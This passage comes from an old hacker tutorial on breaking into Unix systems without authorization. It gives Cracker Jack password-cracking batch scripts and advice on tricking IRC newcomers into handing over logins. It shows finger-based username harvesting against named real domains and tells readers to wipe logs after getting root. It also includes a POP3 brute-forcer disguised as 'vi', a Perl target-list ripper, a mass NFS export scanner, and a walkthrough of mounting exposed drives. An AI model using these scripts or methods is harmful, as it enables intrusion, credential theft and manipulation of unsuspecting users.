.bash_history, or History, you can read these using more. command: more .bash_history, or most times to keep your typing you can type : more .b* (or) just type : more .b (and then hit the tab key on your keyboard). Ok so now you need a good password cracking program. You can see in the next chapter on how to get password files from systems that you do not have an account on, but it is catch 22, you need the password cracking program too. There are three things that you will need. 1. Password cracking program 2. Good word files 3. Password files The best password cracking program to start would be crackerjack. You can search the web and find this easy as 1,2,3. Download it and you are ready to go. If you are a bit more advanced you can download a cjack for unix and run it in a shell. But if you are just getting started get the DOS/OS/2 version. Also search for some good word files. The best word files are the names. You will find that most unsecured passwords out there are guy's girlfriends names, of girls boyfriends names ;) You will find word files like 'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords' hackersdict' and other like these to be the best. Load crackerjack like this: [D:\jack]jack Cracker Jack version 1.4 for OS/2 and DOS (386) Copyright (C) 1993, The Jackal, Denmark PWfile(s) : domain.com.passwd Wordfile : domain.com.passwd Like above run the password file as the wordfile first. This will get you all of the logon's first that used their login name as their password, also if they used any other info like their real name or company name it will hit right away and you will not have to wait for the program to search through a word file. If you want to hash the word file to get more out of it you can read the doc's for crackerjack. Hashing is where you can tell crackerjack to change the case of the wordfile or even add numbers or letters to the beginning or end of the words in the word file, like sandy1 or 1sandy. You will find that many users do this and think they are more secure. Here are hashing files for both the passwd file and your word list. After looking these over you will see how you can modify these or create new ones to suit your needs. ------------ start of dicthash.bat @echo off cls echo - THIS FILE FOR DOS MACHINES echo ---------------------------------------------------------------------- echo - To work this batch file have all of the crackerjack files in the echo - current directory with this batch file, along with your dict and echo - password file. Then use this batch file using the following format: echo - echo - dicthash.bat dictfilename.ext passwordfilename.ext echo - echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well. echo - echo - dicthash will first load jack running the dict file against your echo - password file in both cases, then it will add numbers 0-9 both to echo - the begining and end of every dict word. This will take a while, echo - so go out for that week vacation! echo - echo - If you get tired you can 'ctrl c' to the next option or number. echo - echo - ii@dormroom.pyro.net echo - echo - Mail me some of your hits, let me know how this works for you ;) jpp -lower %1 | jack -stdin %2 jpp %1 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.8 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.8 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.9 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.9 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %2 jpp -dot:0 %1 | jpp -translate:.0 | jack -stdin %2 jpp -dot:7 %1 | jpp -translate:.0 | jack -stdin %2 jpp -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %2 jpp -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %2 ---------------- end of dicthash.bat ---------------- start of jackhash.bat @echo off cls echo - THIS FILE FOR DOS echo ---------------------------------------------------------------------- echo - To work this batch file have all of the crackerjack files in the echo - current directory with this batch file, along with your password file. echo - Then use this batch file using the following format: echo - echo - jackhash.bat passwordfilename.ext echo - echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well. echo - echo - jackhash will first load jack running the passwd file against echo - itself in both upper and lower cases, then it will add numbers 0-9 echo - both to the begining and end of every dict word. This will take echo - a while, so go out for that week vacation! echo - echo - If you get tired you can 'ctrl c' to the next option or number. echo - echo - ii@dormroom.pyro.net echo - echo - Mail me some of your hits, let me know how this works for you ;) jpp -gecos:5 -lower %1 | jack -stdin %1 jpp -gecos:5 %1 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.` | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.` | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.` | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.` | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.~ | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.~ | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.~ | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.~ | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.! | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.! | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.! | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.! | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.A | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.A | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.A | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.A | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.a | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.a | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.a | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.a | jack -stdin %1 jpp -gecos:1 -dot:0 %1 | jpp -translate:.q | jack -stdin %1 jpp -gecos:1 -dot:7 %1 | jpp -translate:.q | jack -stdin %1 jpp -gecos:1 -lower -dot:0 %1 | jpp -translate:.q | jack -stdin %1 jpp -gecos:1 -lower -dot:7 %1 | jpp -translate:.q | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:2 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:2 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:2 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:2 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:4 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:4 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:4 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:4 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.8 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.9 | jack -stdin %1 jpp -gecos:8 -dot:0 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:8 -dot:7 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:8 -lower -dot:0 %1 | jpp -translate:.0 | jack -stdin %1 jpp -gecos:8 -lower -dot:7 %1 | jpp -translate:.0 | jack -stdin %1 --------------- end of jackhash.bat You can get password files without an account, see next chapter. ------------------ Section 2B. Talking to newbe's ------------------ There are other ways to get an account without doing much work. Park yourself on an irc channel that you made with a title about hacking. Also try joining other channels already on the irc. Channels would include: #hacking #unix #unixhacking #hack #hackers #hacker #virus #virii #hackers_hideout or any others you can find. Now what you are looking for are newbe's looking to learn or exploit their shell they are on already. There is always someone out there that does not know as much as you. Watch for someone out there that asks a newbe question and gets no answer or even kicked off the channel. Here is your mark ;) /msg him so that others can't see that you are talking to him, and begin to ask him questions, try to help him, but not too much ;) Finally tell him that you can login for him and do it. This could be to snatch the passwd file or god knows what. Promise him the world and get that login password. Now you have a start and can start your on-hands learning process. If you get root on the system you might not want to expose that to him, but you can feed him other goodies that will keep him busy while you sniff some other passwords on the system. So now if there are some out there that remember i-e when you gave him your login and password, you can be sure that the above never happened rin ... I tend to like to help people learn so I am telling the truth when i say I have dealt honestly with most everyone I have come across. ------------- Section 2C. The hard way ------------- There is another way you can do this. Be sure that on most big systems that users do not use secure passwords. from a shell do this: finger @domainname.com Watch I will do a real domain: [10:35am][/home/ii]finger @starnet.net [starnet.net] Login Name Tty Idle Login Time Office Office Phone chris Chris Myers p2 4:46 Jan 27 11:19 mike Mike Suter p1 4:57 Jan 22 16:14 mike Mike Suter p5 3d Jan 16 15:35 root System Administrator p3 4:59 Jan 16 10:17 wendt Catherine Wendt-Bern p0 3 Jan 21 14:49 [10:35am][/home/ii] Now we might want to try logging in later, log this information: Login chris Password try: Chris, chris, myers, Myers, chrismyers, etc... This one looks good, wendt:Catherine:catherine Here is another command: [10:35am][/home/ii]finger -l @starnet.net [starnet.net] Login: mike Name: Mike Suter Directory: /usra/staff/mike Shell: /bin/csh On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk No Plan. Login: root Name: System Administrator Directory: /root Shell: /bin/csh On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net Mail forwarded to: \chris@admin.starnet.net #\chris@admin.starnet.net, \mike@admin.starnet.net No Plan. Login: wendt Name: Catherine Wendt-Bernal Directory: /usra/staff/wendt Shell: /bin/csh On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout No Plan. You get more info to play with ;) I know this can make you tired .... Remember this stuff will log your tries, so if you get on and get root, clean the logs ;) Here is a small .c file you can use if you get on. pop3hack.c ----- cut here #include #include #include #include #include #include #include #include #include /* First, define the POP-3 port - almost always 110 */ #define POP3_PORT 110 /* What we want our program to be masked as, so nosy sys admin's don't kill us */ #define MASKAS "vi" /* Repeat connect or not - remember, logs still report a connection, so you might want to set this to 0. If set to 0, it will hack until it finds 1 user/password then exit. If set to 1, it will reconnect and try more user/passwords (until it runs out of usernames) */ #define RECONNECT 0 ----- cut here You could also write a small perl script that will finger @ from a domain list and cat the response to a file, then when done it will go back and try to login using pop3d username-username (or other info) and putting the response into another file for you. You can ftp to rs.internic.net: in the domain directory you will find: com.zone.gz edu.zone.gz gov.zone.gz mil.zone.gz net.zone.gz org.zone.gz download these files and run getdomain.pl (script below) on the domains you want to target first, in this manor: "perl getdomain.pl com.zone com >com.all" What this will do is rip all of the .COM domains and put them into a file called comm.all. If you wanted to do all of the .EDU addresses you would type: perl getdomain.pl edu.zone edu >edu.all Now you will have a list to use with your probe called edu.all Here is the perl script getdomain.pl ---- cut here #!/usr/bin/perl # GetDomain By Nfin8 / Invisible Evil # Questions /msg i-e or /msg i^e # # Retrieve command line arguments. my($inputfile, $domain) = @ARGV; usage() if (!defined($inputfile) || !defined($domain)); # Open and preprocess the input file. open(INFILE, "<$inputfile") or die("Cannot open file $inputfile for reading!\n"); my(@lines) = ; # Initialize main data structure. my(%hash) = {}; my($key) = ""; foreach (@lines) { $key = (split(/\ /))[0]; chop($key); next if ((($key =~ tr/.//) < 1) || (uc($domain) ne uc(((split(/\./, $key))[-1]))) || ($key =~ m/root-server/i)); $hash{$key}++; } # Close input file and output data structure to STDOUT. close(INFILE); foreach (sort(keys(%hash))) { print "$_\n"; } sub usage { print("\n\ngetdomain:\n"); print("Usage: getdomain [inputfile] [search]\n\n"); print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n"); exit(0); } 0; ---- cut here - end of script ----- To use the script above all you need to do is copy between the lines above and name it getdomain.pl, now copy it into the unix os and type chmod +x getdomain.pl Now it is ready to run with the command lines above. ------------------------------------------ Section 2D. using Mount to gain access to unix systems ------------------------------------------ This is not hard to do and there are many systems out there that are mountable. Mount is a command in unix that will allow you to mount remote machines drives you yours. This is done so you can do installs from other machines, or just share drives or directories across the network. The problem is that many admins are good with unix commands or setup. Or maybe they are just plain lazy and mount the drives with world access not understanding that the world can mount the drive and gain write access to their users directories. What you will need to get started here is a hacked root account. To be able to mount the remote drive and gain access you will need to modify the system's password file and use the su command. Ok let's say we have root access. let's get started! You can see if another system has mountable drives by using the showmount command. From root account: $root> showmount -e wwa.com mount clntudp_create: RPC: Port mapper failure - RPC: Unable to receive Ok, no problem, this domain will not work, go on to the next one... $root> showmount -e seva.net Export list for seva.net: /var/mail pluto.seva.net /home/user1 pluto.seva.net /usr/local pluto.seva.net,rover.seva.net /export/X11R6.3 rover.seva.net /export/rover rover.seva.net,pluto.seva.net /export/ftp/linux-archive/redhat-4.1/i386/RedHat (everyone) Notice the (everyone), this would be good if we wanted to install linux from this guy's box, but we want open directories to users.... so go on to the next one... $root> showmount -e XXXXX.XXX < this one worked ... find your own ;) Export list for XXXXX.XXX: /export/home (everyone) Now this guy mounted his home directory, the user accounts are off of the home directory ;) and look above ... (everyone) can access it! Ok, this section was to show you how to see if they are mountable, in the next section i will show you how to mount and hack it. But for now, here is a script that will scan for EVERY DOMAIN on the internet that is mountable and log them for you. To use this script simply use the domain ripper in the PHF section and download the needed files from rs.internic.net rip some domains and name the file 'domains' and startup the script. To make it run in the background put a & after the command. like this: cmount.pl& How it works: When you run the file it will go to the domains list and run showmount -e on each domain, if it finds that there is a return on mountable drives it will save the info in the current directory in files named: domain.XXX.export. All you have to do is view the files and mount the drives! --------------- start of cmount.pl #!/usr/bin/perl -w # # Check NFS exports of hosts listed in file. # (Hosts are listed, once per line with no additional whitespaces.) # # ii@dormroom.pyro.net - 2/27/97. # Assign null list to @URLs which will be added to later. my(@result) = (); my(@domains) = (); my($program) = "showmount -e "; # Pull off filename from commandline. If it isn't defined, then assign default. my($DomainFilename) = shift; $DomainFilename = "domains" if !defined($DomainFilename); # Do checking on input. die("mountDomains: $DomainFilename is a directory.\n") if (-d $DomainFilename); # Open $DomainFilename. open(DOMAINFILE, $DomainFilename) or die("mountDomains: Cannot open $DomainFilename for input.\n"); while () { chomp($_); print "Now checking: $_"; # Note difference in program output capture from "geturl.pl". open (EXECFILE, "$program $_ |"); @execResult = ; next if (!defined($execResult[0])); if ($execResult[0] =~ /^Export/) { print " - Export list saved."; open (OUTFILE, ">$_.export"); foreach (@execResult) { print OUTFILE; } close (OUTFILE); } close(EXECFILE); print "\n"; } # We are done. Close all files and end the program. close (DOMAINFILE); 0; ----------------- end of cmount.pl Ok, now on to mounting the drives .... lets say we did a showmount -e domain.com and got back: Export list for domain.com: / (everyone) /p1 (everyone) /p2 (everyone) /p3 (everyone) /p5 (everyone) /p6 (everyone) /p7 (everyone) /var/spool/mail titan,europa,galifrey /tmp (everyone) We would want to mount / .. yup .... this guy has his entire system mountable! $root> mkdir /tmp/mount $root> mount -nt nfs domain.com:/ /tmp/mount If he had the home directory mountable the command would be: $root> mount -nt nfs domain.com:/home /tmp/mount To unmount the system, make sure you are out of the directory and type: $root> umount /tmp/mount Make sure you make the mount directory first, you can make this anywhere on the system that you want. If the systems /mnt directory is empty you can use it also. Ok this is for real: bash# ls -al /mnt ; making sure the mnt dir is empty ls: /mnt: No such file or directory ; there was not even a dir there ;) bash# mkdir /mnt ; lets make one for them rin bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker ... bash# cd /mnt ; changing to the mounted drive... bash# ls ; just the plain dir .. TT_DB home raddb share back local radius-961029.gz www exec lost+found radius-961029.ps bash# ; there is is up there, the home dir ... oh good ... bash# cd home bash# ls -l ; long directory listing ... tom is looking good here ;) total 18 drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk drwxr-xr-x 6 news news 512 Mar 6 1996 news drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom 